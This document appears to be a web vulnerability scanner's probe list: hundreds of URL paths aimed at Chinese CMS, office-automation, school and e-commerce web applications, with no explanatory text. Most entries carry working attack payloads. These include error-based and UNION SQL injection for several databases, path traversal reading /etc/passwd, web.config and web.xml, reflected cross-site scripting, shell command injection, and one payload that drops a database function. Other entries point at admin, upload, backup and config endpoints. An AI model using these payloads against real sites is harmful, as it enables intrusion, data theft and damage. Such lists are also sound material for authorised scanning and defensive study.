/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
